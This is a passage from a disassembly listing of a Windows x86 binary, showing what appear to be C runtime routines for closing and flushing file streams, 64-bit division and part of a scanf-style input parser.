loc_40909E:				; CODE XREF: sub_40900D+8Dj
		pop	edi
		pop	esi
		retn
sub_40900D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4090A1	proc near		; CODE XREF: sub_4039DF+48p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	10h
		push	offset dword_422AC8
		call	__SEH_prolog4
		mov	eax, [ebp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_4090D0
		call	sub_405DA6
		and	dword ptr [eax], 0
		call	sub_405D93
		mov	dword ptr [eax], 9

loc_4090C8:				; CODE XREF: sub_4090A1+5Cj
		or	eax, 0FFFFFFFFh
		jmp	loc_40915E
; ---------------------------------------------------------------------------

loc_4090D0:				; CODE XREF: sub_4090A1+12j
		xor	edi, edi
		cmp	eax, edi
		jl	short loc_4090DE
		cmp	eax, dword_437EA4
		jb	short loc_4090FF

loc_4090DE:				; CODE XREF: sub_4090A1+33j
					; sub_4090A1+7Cj
		call	sub_405DA6
		mov	[eax], edi
		call	sub_405D93
		mov	dword ptr [eax], 9
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		jmp	short loc_4090C8
; ---------------------------------------------------------------------------

loc_4090FF:				; CODE XREF: sub_4090A1+3Bj
		mov	ecx, eax
		sar	ecx, 5
		lea	ebx, ds:437EC0h[ecx*4]
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
		mov	ecx, [ebx]
		movzx	ecx, byte ptr [ecx+esi+4]
		and	ecx, 1
		jz	short loc_4090DE
		push	eax
		call	sub_40F3AE
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		mov	eax, [ebx]
		test	byte ptr [eax+esi+4], 1
		jz	short loc_409140
		push	[ebp+arg_0]
		call	sub_40900D
		pop	ecx
		mov	[ebp+var_1C], eax
		jmp	short loc_40914F
; ---------------------------------------------------------------------------

loc_409140:				; CODE XREF: sub_4090A1+8Fj
		call	sub_405D93
		mov	dword ptr [eax], 9
		or	[ebp+var_1C], 0FFFFFFFFh

loc_40914F:				; CODE XREF: sub_4090A1+9Dj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_409164
		mov	eax, [ebp+var_1C]

loc_40915E:				; CODE XREF: sub_4090A1+2Aj
		call	__SEH_epilog4
		retn
sub_4090A1	endp


; =============== S U B	R O U T	I N E =======================================



sub_409164	proc near		; CODE XREF: sub_4090A1+B5p
					; DATA XREF: zcrshv4o:00422AE0o
		push	dword ptr [ebp+8]
		call	sub_40F44E
		pop	ecx
		retn
sub_409164	endp


; =============== S U B	R O U T	I N E =======================================



sub_40916E	proc near		; CODE XREF: sub_4039DF+3Cp

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		mov	eax, [esi+0Ch]
		test	al, 83h
		jz	short loc_409198
		test	al, 8
		jz	short loc_409198
		push	dword ptr [esi+8]
		call	sub_403B91
		and	dword ptr [esi+0Ch], 0FFFFFBF7h
		xor	eax, eax
		pop	ecx
		mov	[esi], eax
		mov	[esi+8], eax
		mov	[esi+4], eax

loc_409198:				; CODE XREF: sub_40916E+Aj
					; sub_40916E+Ej
		pop	esi
		retn
sub_40916E	endp


; =============== S U B	R O U T	I N E =======================================



sub_40919A	proc near		; CODE XREF: sub_4039DF+34p
					; sub_408D71+15p ...

arg_0		= dword	ptr  4

		push	ebx
		push	esi
		mov	esi, [esp+8+arg_0]
		mov	eax, [esi+0Ch]
		mov	ecx, eax
		and	cl, 3
		xor	ebx, ebx
		cmp	cl, 2
		jnz	short loc_4091EE
		test	ax, 108h
		jz	short loc_4091EE
		mov	eax, [esi+8]
		push	edi
		mov	edi, [esi]
		sub	edi, eax
		test	edi, edi
		jle	short loc_4091ED
		push	edi
		push	eax
		push	esi
		call	sub_408FE0
		pop	ecx
		push	eax
		call	sub_40D9E0
		add	esp, 0Ch
		cmp	eax, edi
		jnz	short loc_4091E6
		mov	eax, [esi+0Ch]
		test	al, al
		jns	short loc_4091ED
		and	eax, 0FFFFFFFDh
		mov	[esi+0Ch], eax
		jmp	short loc_4091ED
; ---------------------------------------------------------------------------

loc_4091E6:				; CODE XREF: sub_40919A+3Bj
		or	dword ptr [esi+0Ch], 20h
		or	ebx, 0FFFFFFFFh

loc_4091ED:				; CODE XREF: sub_40919A+25j
					; sub_40919A+42j ...
		pop	edi

loc_4091EE:				; CODE XREF: sub_40919A+13j
					; sub_40919A+19j
		mov	eax, [esi+8]
		and	dword ptr [esi+4], 0
		mov	[esi], eax
		pop	esi
		mov	eax, ebx
		pop	ebx
		retn
sub_40919A	endp


; =============== S U B	R O U T	I N E =======================================



sub_4091FC	proc near		; CODE XREF: sub_40923E+69p
					; sub_40923E+84p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		test	esi, esi
		jnz	short loc_40920E
		push	esi
		call	sub_40923E
		pop	ecx
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40920E:				; CODE XREF: sub_4091FC+7j
		push	esi
		call	sub_40919A
		test	eax, eax
		pop	ecx
		jz	short loc_40921E
		or	eax, 0FFFFFFFFh
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40921E:				; CODE XREF: sub_4091FC+1Bj
		test	word ptr [esi+0Ch], 4000h
		jz	short loc_40923A
		push	esi
		call	sub_408FE0
		push	eax
		call	sub_40F60F
		pop	ecx
		pop	ecx
		neg	eax
		sbb	eax, eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40923A:				; CODE XREF: sub_4091FC+28j
		xor	eax, eax
		pop	esi
		retn
sub_4091FC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40923E	proc near		; CODE XREF: sub_4091FC+Ap
					; sub_409318+2p

var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 004092F1 SIZE 0000001E BYTES

		push	14h
		push	offset dword_422AE8
		call	__SEH_prolog4
		xor	edi, edi
		mov	[ebp+var_1C], edi
		mov	[ebp+var_24], edi
		push	1
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		xor	esi, esi

loc_40925F:				; CODE XREF: sub_40923E+9Bj
		mov	[ebp+var_20], esi
		cmp	esi, dword_438FE0
		jge	loc_4092F1
		mov	eax, dword_437FC0
		lea	eax, [eax+esi*4]
		cmp	[eax], edi
		jz	short loc_4092D8
		mov	eax, [eax]
		test	byte ptr [eax+0Ch], 83h
		jz	short loc_4092D8
		push	eax
		push	esi
		call	sub_40874A
		pop	ecx
		pop	ecx
		xor	edx, edx
		inc	edx
		mov	[ebp+ms_exc.disabled], edx
		mov	eax, dword_437FC0
		mov	eax, [eax+esi*4]
		mov	ecx, [eax+0Ch]
		test	cl, 83h
		jz	short loc_4092D0
		cmp	[ebp+arg_0], edx
		jnz	short loc_4092B7
		push	eax
		call	sub_4091FC
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		jz	short loc_4092D0
		inc	[ebp+var_1C]
		jmp	short loc_4092D0
; ---------------------------------------------------------------------------

loc_4092B7:				; CODE XREF: sub_40923E+66j
		cmp	[ebp+arg_0], edi
		jnz	short loc_4092D0
		test	cl, 2
		jz	short loc_4092D0
		push	eax
		call	sub_4091FC
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_4092D0
		or	[ebp+var_24], eax

loc_4092D0:				; CODE XREF: sub_40923E+61j
					; sub_40923E+72j ...
		mov	[ebp+ms_exc.disabled], edi
		call	sub_4092E0

loc_4092D8:				; CODE XREF: sub_40923E+3Aj
					; sub_40923E+42j
		inc	esi
		jmp	short loc_40925F
sub_40923E	endp


; =============== S U B	R O U T	I N E =======================================



sub_4092DB	proc near		; DATA XREF: zcrshv4o:00422B0Co
		xor	edi, edi
		mov	esi, [ebp-20h]
sub_4092DB	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4092E0	proc near		; CODE XREF: sub_40923E+95p
		mov	eax, dword_437FC0
		push	dword ptr [eax+esi*4]
		push	esi
		call	sub_40879C
		pop	ecx
		pop	ecx
		retn
sub_4092E0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_40923E

loc_4092F1:				; CODE XREF: sub_40923E+2Aj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40930F
		cmp	[ebp+arg_0], 1
		mov	eax, [ebp+var_1C]
		jz	short loc_409309
		mov	eax, [ebp+var_24]

loc_409309:				; CODE XREF: sub_40923E+C6j
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_40923E

; =============== S U B	R O U T	I N E =======================================



sub_40930F	proc near		; CODE XREF: sub_40923E+BAp
					; DATA XREF: zcrshv4o:00422B00o
		push	1
		call	sub_405EDF
		pop	ecx
		retn
sub_40930F	endp


; =============== S U B	R O U T	I N E =======================================



sub_409318	proc near		; CODE XREF: sub_4086FBp
		push	1
		call	sub_40923E
		pop	ecx
		retn
sub_409318	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_409330	proc near		; CODE XREF: sub_403ACE+29p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	ebx
		push	esi
		mov	eax, [esp+8+arg_C]
		or	eax, eax
		jnz	short loc_409352
		mov	ecx, [esp+8+arg_8]
		mov	eax, [esp+8+arg_4]
		xor	edx, edx
		div	ecx
		mov	ebx, eax
		mov	eax, [esp+8+arg_0]
		div	ecx
		mov	edx, ebx
		jmp	short loc_409393
; ---------------------------------------------------------------------------

loc_409352:				; CODE XREF: sub_409330+8j
		mov	ecx, eax
		mov	ebx, [esp+8+arg_8]
		mov	edx, [esp+8+arg_4]
		mov	eax, [esp+8+arg_0]

loc_409360:				; CODE XREF: sub_409330+3Aj
		shr	ecx, 1
		rcr	ebx, 1
		shr	edx, 1
		rcr	eax, 1
		or	ecx, ecx
		jnz	short loc_409360
		div	ebx
		mov	esi, eax
		mul	[esp+8+arg_C]
		mov	ecx, eax
		mov	eax, [esp+8+arg_8]
		mul	esi
		add	edx, ecx
		jb	short loc_40938E
		cmp	edx, [esp+8+arg_4]
		ja	short loc_40938E
		jb	short loc_40938F
		cmp	eax, [esp+8+arg_0]
		jbe	short loc_40938F

loc_40938E:				; CODE XREF: sub_409330+4Ej
					; sub_409330+54j
		dec	esi

loc_40938F:				; CODE XREF: sub_409330+56j
					; sub_409330+5Cj
		xor	edx, edx
		mov	eax, esi

loc_409393:				; CODE XREF: sub_409330+20j
		pop	esi
		pop	ebx
		retn	10h
sub_409330	endp


; =============== S U B	R O U T	I N E =======================================



sub_409398	proc near		; CODE XREF: sub_409427+3CDp
					; sub_409427+447p ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		mov	eax, [esi]
		cmp	[esp+arg_0], eax
		jnz	short loc_4093E8
		mov	ecx, [edi]
		cmp	ecx, [esp+arg_4]
		push	2
		push	eax
		jnz	short loc_4093D7
		call	sub_407D3A
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	[edi], eax
		jnz	short loc_4093BB

loc_4093B8:				; CODE XREF: sub_409398+4Aj
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_4093BB:				; CODE XREF: sub_409398+1Ej
		mov	eax, [esp+arg_8]
		mov	dword ptr [eax], 1
		push	dword ptr [esi]
		push	[esp+4+arg_4]
		push	dword ptr [edi]
		call	sub_4081B0
		add	esp, 0Ch
		jmp	short loc_4093E6
; ---------------------------------------------------------------------------

loc_4093D7:				; CODE XREF: sub_409398+11j
		push	ecx
		call	sub_407DCD
		add	esp, 0Ch
		test	eax, eax
		jz	short loc_4093B8
		mov	[edi], eax

loc_4093E6:				; CODE XREF: sub_409398+3Dj
		shl	dword ptr [esi], 1

loc_4093E8:				; CODE XREF: sub_409398+6j
		xor	eax, eax
		inc	eax
		retn
sub_409398	endp


; =============== S U B	R O U T	I N E =======================================



sub_4093EC	proc near		; CODE XREF: sub_409402+7p
					; sub_409427+2E1p ...
		dec	dword ptr [edx+4]
		js	short loc_4093FA
		mov	ecx, [edx]
		movzx	eax, byte ptr [ecx]
		inc	ecx
		mov	[edx], ecx
		retn
; ---------------------------------------------------------------------------

loc_4093FA:				; CODE XREF: sub_4093EC+3j
		push	edx
		call	sub_40A24D
		pop	ecx
		retn
sub_4093EC	endp


; =============== S U B	R O U T	I N E =======================================



sub_409402	proc near		; CODE XREF: sub_409427+14Fp
					; sub_409427+2D3p

arg_0		= dword	ptr  4

		push	ebx

loc_409403:				; CODE XREF: sub_409402+1Fj
		mov	edx, [esp+4+arg_0]
		inc	dword ptr [esi]
		call	sub_4093EC
		mov	ebx, eax
		cmp	ebx, 0FFFFFFFFh
		jz	short loc_409423
		movzx	eax, bl
		push	eax
		call	sub_40F836
		test	eax, eax
		pop	ecx
		jnz	short loc_409403

loc_409423:				; CODE XREF: sub_409402+11j
		mov	eax, ebx
		pop	ebx
		retn
sub_409402	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=18Ch


sub_409427	proc near		; DATA XREF: sub_403B72+10o

var_1FC		= dword	ptr -1FCh
var_1F8		= dword	ptr -1F8h
var_1F0		= dword	ptr -1F0h
var_1EC		= byte ptr -1ECh
var_1E8		= dword	ptr -1E8h
var_1E4		= dword	ptr -1E4h
var_1E0		= dword	ptr -1E0h
var_1DC		= byte ptr -1DCh
var_1DB		= byte ptr -1DBh
var_1D8		= dword	ptr -1D8h
var_1D4		= dword	ptr -1D4h
var_1D0		= dword	ptr -1D0h
var_1C9		= byte ptr -1C9h
var_1C8		= dword	ptr -1C8h
var_1C4		= dword	ptr -1C4h
var_1C0		= dword	ptr -1C0h
var_1BC		= dword	ptr -1BCh
var_1B8		= dword	ptr -1B8h
var_1B4		= dword	ptr -1B4h
var_1B0		= dword	ptr -1B0h
var_1AC		= dword	ptr -1ACh
var_1A8		= dword	ptr -1A8h
var_1A4		= byte ptr -1A4h
var_1A3		= byte ptr -1A3h
var_1A2		= byte ptr -1A2h
var_1A1		= byte ptr -1A1h
var_1A0		= dword	ptr -1A0h
var_19A		= byte ptr -19Ah
var_199		= byte ptr -199h
var_198		= dword	ptr -198h
var_191		= byte ptr -191h
var_190		= dword	ptr -190h
var_189		= byte ptr -189h
var_188		= dword	ptr -188h
var_184		= byte ptr -184h
var_24		= byte ptr -24h
var_19		= byte ptr -19h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		lea	ebp, [esp-18Ch]
		sub	esp, 1FCh
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+18Ch+var_4], eax
		mov	eax, [ebp+18Ch+arg_C]
		push	ebx
		push	esi
		mov	esi, [ebp+18Ch+arg_0]
		xor	ebx, ebx
		push	edi
		mov	edi, [ebp+18Ch+arg_4]
		cmp	edi, ebx
		mov	[ebp+18Ch+var_1E4], eax
		lea	eax, [ebp+18Ch+var_184]
		mov	[ebp+18Ch+var_1A0], esi
		mov	[ebp+18Ch+var_1B4], edi
		mov	[ebp+18Ch+var_1B0], eax
		mov	[ebp+18Ch+var_1D8], 15Eh
		mov	[ebp+18Ch+var_1D0], ebx
		mov	[ebp+18Ch+var_1E8], ebx
		mov	[ebp+18Ch+var_190], ebx
		jnz	short loc_40949C

loc_40947C:				; CODE XREF: sub_409427+77j
					; sub_409427+C6j ...
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	loc_40A05C
; ---------------------------------------------------------------------------

loc_40949C:				; CODE XREF: sub_409427+53j
		cmp	esi, ebx
		jz	short loc_40947C
		test	byte ptr [esi+0Ch], 40h
		jnz	loc_40953B
		push	esi
		call	sub_408FE0
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_4094E4
		push	esi
		call	sub_408FE0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_4094E4
		push	esi
		call	sub_408FE0
		sar	eax, 5
		push	esi
		lea	edi, ds:437EC0h[eax*4]
		call	sub_408FE0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		pop	ecx
		pop	ecx
		jmp	short loc_4094E9
; ---------------------------------------------------------------------------

loc_4094E4:				; CODE XREF: sub_409427+8Dj
					; sub_409427+99j
		mov	eax, offset dword_424BD0

loc_4094E9:				; CODE XREF: sub_409427+BBj
		test	byte ptr [eax+24h], 7Fh
		jnz	short loc_40947C
		push	esi
		call	sub_408FE0
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_409529
		push	esi
		call	sub_408FE0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_409529
		push	esi
		call	sub_408FE0
		sar	eax, 5
		push	esi
		lea	edi, ds:437EC0h[eax*4]
		call	sub_408FE0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		pop	ecx
		pop	ecx
		jmp	short loc_40952E
; ---------------------------------------------------------------------------

loc_409529:				; CODE XREF: sub_409427+D2j
					; sub_409427+DEj
		mov	eax, offset dword_424BD0

loc_40952E:				; CODE XREF: sub_409427+100j
		test	byte ptr [eax+24h], 80h
		jnz	loc_40947C
		mov	edi, [ebp+18Ch+var_1B4]

loc_40953B:				; CODE XREF: sub_409427+7Dj
		push	[ebp+18Ch+arg_8]
		lea	ecx, [ebp+18Ch+var_1F8]
		call	sub_402CAD
		mov	al, [edi]
		test	al, al
		mov	[ebp+18Ch+var_1A1], bl
		mov	[ebp+18Ch+var_188], ebx
		mov	[ebp+18Ch+var_1C8], ebx
		jz	loc_40A04C
		mov	edi, [ebp+18Ch+var_1B4]

loc_40955F:				; CODE XREF: sub_409427+BC2j
		movzx	eax, al
		push	eax
		call	sub_40F836
		test	eax, eax
		pop	ecx
		jz	short loc_4095A0
		push	[ebp+18Ch+var_1A0]
		dec	[ebp+18Ch+var_188]
		lea	esi, [ebp+18Ch+var_188]
		call	sub_409402
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_40958C
		push	[ebp+18Ch+var_1A0]
		push	eax
		call	sub_40F85F
		pop	ecx
		pop	ecx

loc_40958C:				; CODE XREF: sub_409427+158j
					; sub_409427+172j
		inc	edi
		movzx	eax, byte ptr [edi]
		push	eax
		call	sub_40F836
		test	eax, eax
		pop	ecx
		jnz	short loc_40958C
		jmp	loc_409FE5
; ---------------------------------------------------------------------------

loc_4095A0:				; CODE XREF: sub_409427+144j
		cmp	byte ptr [edi],	25h
		jnz	loc_409F8D
		xor	eax, eax
		mov	[ebp+18Ch+var_1E0], eax
		mov	[ebp+18Ch+var_1C9], al
		mov	[ebp+18Ch+var_1A8], eax
		mov	[ebp+18Ch+var_1B8], eax
		mov	[ebp+18Ch+var_198], eax
		mov	[ebp+18Ch+var_1A4], al
		mov	[ebp+18Ch+var_1A3], al
		mov	[ebp+18Ch+var_199], al
		mov	[ebp+18Ch+var_189], al
		mov	[ebp+18Ch+var_1A2], al
		mov	[ebp+18Ch+var_191], al
		mov	[ebp+18Ch+var_19A], 1
		mov	[ebp+18Ch+var_1D4], eax
		xor	esi, esi

loc_4095D5:				; CODE XREF: sub_409427+279j
		inc	edi
		movzx	ebx, byte ptr [edi]
		movzx	eax, bl
		push	eax
		call	sub_40F73F
		test	eax, eax
		pop	ecx
		jz	short loc_4095FC
		mov	eax, [ebp+18Ch+var_198]
		inc	[ebp+18Ch+var_1B8]
		imul	eax, 0Ah
		lea	eax, [eax+ebx-30h]
		mov	[ebp+18Ch+var_198], eax
		jmp	loc_40969C
; ---------------------------------------------------------------------------

loc_4095FC:				; CODE XREF: sub_409427+1BEj
		cmp	ebx, 4Eh
		jg	short loc_409672
		jz	loc_40969C
		cmp	ebx, 2Ah
		jz	short loc_40966D
		cmp	ebx, 46h
		jz	loc_40969C
		cmp	ebx, 49h
		jz	short loc_409624
		cmp	ebx, 4Ch
		jnz	short loc_409681
		inc	[ebp+18Ch+var_19A]
		jmp	short loc_40969C
; ---------------------------------------------------------------------------

loc_409624:				; CODE XREF: sub_409427+1F1j
		mov	cl, [edi+1]
		cmp	cl, 36h
		jnz	short loc_409641
		lea	eax, [edi+2]
		cmp	byte ptr [eax],	34h
		jnz	short loc_409641

loc_409634:				; CODE XREF: sub_409427+265j
		inc	[ebp+18Ch+var_1D4]
		mov	edi, eax
		mov	[ebp+18Ch+var_1C0], esi
		mov	[ebp+18Ch+var_1BC], esi
		jmp	short loc_40969C
; ---------------------------------------------------------------------------

loc_409641:				; CODE XREF: sub_409427+203j
					; sub_409427+20Bj
		cmp	cl, 33h
		jnz	short loc_409652
		lea	eax, [edi+2]
		cmp	byte ptr [eax],	32h
		jnz	short loc_409652
		mov	edi, eax
		jmp	short loc_40969C
; ---------------------------------------------------------------------------

loc_409652:				; CODE XREF: sub_409427+21Dj
					; sub_409427+225j
		cmp	cl, 64h
		jz	short loc_40969C
		cmp	cl, 69h
		jz	short loc_40969C
		cmp	cl, 6Fh
		jz	short loc_40969C
		cmp	cl, 78h
		jz	short loc_40969C
		cmp	cl, 58h
		jnz	short loc_409681
		jmp	short loc_40969C
; ---------------------------------------------------------------------------

loc_40966D:				; CODE XREF: sub_409427+1E3j
		inc	[ebp+18Ch+var_199]
		jmp	short loc_40969C
; ---------------------------------------------------------------------------

loc_409672:				; CODE XREF: sub_409427+1D8j
		cmp	ebx, 68h
		jz	short loc_409696
		cmp	ebx, 6Ch
		jz	short loc_409686
		cmp	ebx, 77h
		jz	short loc_409691

loc_409681:				; CODE XREF: sub_409427+1F6j
					; sub_409427+242j
		inc	[ebp+18Ch+var_189]
		jmp	short loc_40969C
; ---------------------------------------------------------------------------

loc_409686:				; CODE XREF: sub_409427+253j
		lea	eax, [edi+1]
		cmp	byte ptr [eax],	6Ch
		jz	short loc_409634
		inc	[ebp+18Ch+var_19A]

loc_409691:				; CODE XREF: sub_409427+258j
		inc	[ebp+18Ch+var_191]
		jmp	short loc_40969C
; ---------------------------------------------------------------------------

loc_409696:				; CODE XREF: sub_409427+24Ej
		dec	[ebp+18Ch+var_19A]
		dec	[ebp+18Ch+var_191]

loc_40969C:				; CODE XREF: sub_409427+1D0j
					; sub_409427+1DAj ...
		cmp	[ebp+18Ch+var_189], 0
		jz	loc_4095D5
		cmp	[ebp+18Ch+var_199], 0
		mov	[ebp+18Ch+var_1B4], edi
		jnz	short loc_4096BD
		mov	eax, [ebp+18Ch+var_1E4]
		mov	esi, [eax]
		mov	[ebp+18Ch+var_1FC], eax
		add	eax, 4
		mov	[ebp+18Ch+var_1E4], eax

loc_4096BD:				; CODE XREF: sub_409427+286j
		cmp	[ebp+18Ch+var_191], 0
		mov	[ebp+18Ch+var_1C4], esi
		mov	[ebp+18Ch+var_189], 0
		jnz	short loc_4096DC
		mov	al, [edi]
		cmp	al, 53h
		jz	short loc_4096D8
		cmp	al, 43h
		mov	[ebp+18Ch+var_191], 0FFh
		jnz	short loc_4096DC

loc_4096D8:				; CODE XREF: sub_409427+2A7j
		mov	[ebp+18Ch+var_191], 1

loc_4096DC:				; CODE XREF: sub_409427+2A1j
					; sub_409427+2AFj
		movzx	ebx, byte ptr [edi]
		or	ebx, 20h
		cmp	ebx, 6Eh
		mov	[ebp+18Ch+var_1AC], ebx
		jz	short loc_40971F
		cmp	ebx, 63h
		jz	short loc_409702
		cmp	ebx, 7Bh
		jz	short loc_409702
		push	[ebp+18Ch+var_1A0]
		lea	esi, [ebp+18Ch+var_188]
		call	sub_409402
		pop	ecx
		jmp	short loc_40970D
; ---------------------------------------------------------------------------

loc_409702:				; CODE XREF: sub_409427+2C6j
					; sub_409427+2CBj
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC

loc_40970D:				; CODE XREF: sub_409427+2D9j
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+18Ch+var_190], eax
		jz	loc_40A019
		mov	esi, [ebp+18Ch+var_1C4]
		mov	edi, [ebp+18Ch+var_1B4]

loc_40971F:				; CODE XREF: sub_409427+2C1j
		mov	ecx, [ebp+18Ch+var_1B8]
		test	ecx, ecx
		jz	short loc_409730
		cmp	[ebp+18Ch+var_198], 0
		jz	loc_409FF1

loc_409730:				; CODE XREF: sub_409427+2FDj
		cmp	ebx, 6Fh
		jg	loc_409B3C
		jz	loc_409D67
		cmp	ebx, 63h
		jz	loc_409A2E
		push	64h
		pop	eax
		cmp	ebx, eax
		jz	loc_409D67
		jle	loc_409B66
		cmp	ebx, 67h
		jle	short loc_409796
		cmp	ebx, 69h
		jz	short loc_40977E
		cmp	ebx, 6Eh
		jnz	loc_409B66
		cmp	[ebp+18Ch+var_199], 0
		mov	edi, [ebp+18Ch+var_188]
		jz	loc_409F61
		jmp	loc_409F81
; ---------------------------------------------------------------------------

loc_40977E:				; CODE XREF: sub_409427+33Aj
		mov	[ebp+18Ch+var_1AC], eax

loc_409781:				; CODE XREF: sub_409427+734j
		mov	ebx, [ebp+18Ch+var_190]
		cmp	ebx, 2Dh
		jnz	loc_409C4F
		mov	[ebp+18Ch+var_1A3], 1
		jmp	loc_409C54
; ---------------------------------------------------------------------------

loc_409796:				; CODE XREF: sub_409427+335j
		xor	ebx, ebx
		cmp	[ebp+18Ch+var_190], 2Dh
		jnz	short loc_4097A7
		mov	eax, [ebp+18Ch+var_1B0]
		mov	byte ptr [eax],	2Dh
		inc	ebx
		jmp	short loc_4097AD
; ---------------------------------------------------------------------------

loc_4097A7:				; CODE XREF: sub_409427+375j
		cmp	[ebp+18Ch+var_190], 2Bh
		jnz	short loc_4097BE

loc_4097AD:				; CODE XREF: sub_409427+37Ej
		dec	[ebp+18Ch+var_198]
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	[ebp+18Ch+var_190], eax

loc_4097BE:				; CODE XREF: sub_409427+384j
		cmp	[ebp+18Ch+var_1B8], 0
		jnz	short loc_4097C8
		or	[ebp+18Ch+var_198], 0FFFFFFFFh

loc_4097C8:				; CODE XREF: sub_409427+39Bj
		movzx	eax, byte ptr [ebp+18Ch+var_190]
		jmp	short loc_409815
; ---------------------------------------------------------------------------

loc_4097CE:				; CODE XREF: sub_409427+3F7j
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	short loc_409820
		mov	al, byte ptr [ebp+18Ch+var_190]
		mov	ecx, [ebp+18Ch+var_1B0]
		inc	[ebp+18Ch+var_1A8]
		mov	[ebx+ecx], al
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		lea	edi, [ebp+18Ch+var_1B0]
		lea	esi, [ebp+18Ch+var_1D8]
		call	sub_409398
		add	esp, 0Ch
		test	eax, eax
		jz	loc_40A019
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	[ebp+18Ch+var_190], eax
		movzx	eax, al

loc_409815:				; CODE XREF: sub_409427+3A5j
		push	eax
		call	sub_40F73F
		test	eax, eax
		pop	ecx
		jnz	short loc_4097CE

loc_409820:				; CODE XREF: sub_409427+3AFj
		mov	eax, [ebp+18Ch+var_1F8]
		mov	eax, [eax+0BCh]
		mov	eax, [eax]
		mov	al, [eax]
		cmp	al, byte ptr [ebp+18Ch+var_190]
		mov	[ebp+18Ch+var_1A4], al
		jnz	loc_4098D6
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	loc_4098D6
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	ecx, [ebp+18Ch+var_1B0]
		mov	[ebp+18Ch+var_190], eax
		mov	al, [ebp+18Ch+var_1A4]
		mov	[ebx+ecx], al
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		lea	edi, [ebp+18Ch+var_1B0]
		lea	esi, [ebp+18Ch+var_1D8]
		call	sub_409398
		add	esp, 0Ch
		test	eax, eax
		jz	loc_40A019
		movzx	eax, byte ptr [ebp+18Ch+var_190]
		jmp	short loc_4098CB
; ---------------------------------------------------------------------------

loc_409884:				; CODE XREF: sub_409427+4ADj
		mov	eax, [ebp+18Ch+var_198]
		dec	[ebp+18Ch+var_198]
		test	eax, eax
		jz	short loc_4098D6
		mov	eax, [ebp+18Ch+var_1B0]
		mov	cl, byte ptr [ebp+18Ch+var_190]
		inc	[ebp+18Ch+var_1A8]
		mov	[ebx+eax], cl
		lea	eax, [ebp+18Ch+var_1D0]
		push	eax
		lea	eax, [ebp+18Ch+var_184]
		push	eax
		inc	ebx
		push	ebx
		lea	edi, [ebp+18Ch+var_1B0]
		lea	esi, [ebp+18Ch+var_1D8]
		call	sub_409398
		add	esp, 0Ch
		test	eax, eax
		jz	loc_40A019
		mov	edx, [ebp+18Ch+var_1A0]
		inc	[ebp+18Ch+var_188]
		call	sub_4093EC
		mov	[ebp+18Ch+var_190], eax
		movzx	eax, al

loc_4098CB:				; CODE XREF: sub_409427+45Bj
		push	eax
		call	sub_40F73F
		test	eax, eax
		pop	ecx
		jnz	short loc_409884

